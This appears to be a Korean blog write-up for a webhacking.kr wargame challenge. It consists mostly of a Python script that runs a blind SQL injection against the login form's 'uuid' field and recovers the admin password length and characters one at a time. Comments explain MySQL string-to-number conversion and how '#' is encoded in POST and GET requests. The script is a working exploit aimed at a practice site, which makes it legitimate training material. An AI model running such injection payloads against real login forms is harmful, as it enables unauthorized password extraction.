728x90

import requests

url='https://webhacking.kr/challenge/bonus-2/index.php'
cookie={'PHPSESSID':'74obv0eti09jn2pn9di4eklsq4'}

def find_pw_len():
    pw_len=1
    while True:
        payload={'uuid':"admin' and length(pw)={}#".format(pw_len),'pw':'1'}
        res=requests.post(url, data=payload, cookies=cookie)
        
        if 'Wrong' in res.text:
            return pw_len
        else:
            pw_len+=1

def find_pw():
    pw_len=find_pw_len()
    for i in range(1,33):
        for j in range(128):
            
            #payload={'uuid':"admin' and ord(substr(pw,{},1))={}#".format(i,j),'pw':'1'}
            payload={'uuid':"admin' and ascii(substr(pw,{},1))={}#".format(i,j),'pw':'1'}
            #두 쿼리의 결과 동일. 단 ascii 빼고 j 대신 chr(j)로 바꾸면 원하는 결과 안나옴.
            #mysql에서 문자열을 숫자로 자동변환하는 특징때문에 '문자'=0이 됨. 따라서 알파벳은 j가 48('0')일때 늘 조건이 참이 됨.
            #payload 부분에서 주석을 21번 문제와 달리 '#'을 입력해야함. post 방식에서는 payload의 값들은 입력폼에 입력한 값과 같음.
            #입력폼에 %23이라고 쓰면 %2523으로 url 인코딩돼서 서버로 전달됨. BURP SUITE로 확인하면 바로 알 수 있음.
            #21번처럼 get 방식에서는 url에 쿼리문을 입력한 것과 같으므로 '%23'을 써야 php에서 '#'으로 인식함. '#'은 URL 예약문자라 URL인코딩 안됨.
            res=requests.post(url,data=payload,cookies=cookie)

            if 'Wrong' in res.text:
                print(chr(j))
                break

find_pw()         

728x90

'webhacking.kr' 카테고리의 다른 글

webhacking 26(URL Encoding)  (0) 2022.12.18
webhacking 25(LFI)  (0) 2022.12.17
webhacking 24(PHP)  (0) 2022.12.17
webhacking 23(XSS)  (0) 2022.12.17
webhacking 21(Blind SQL Injection)  (0) 2022.12.16

+ Recent posts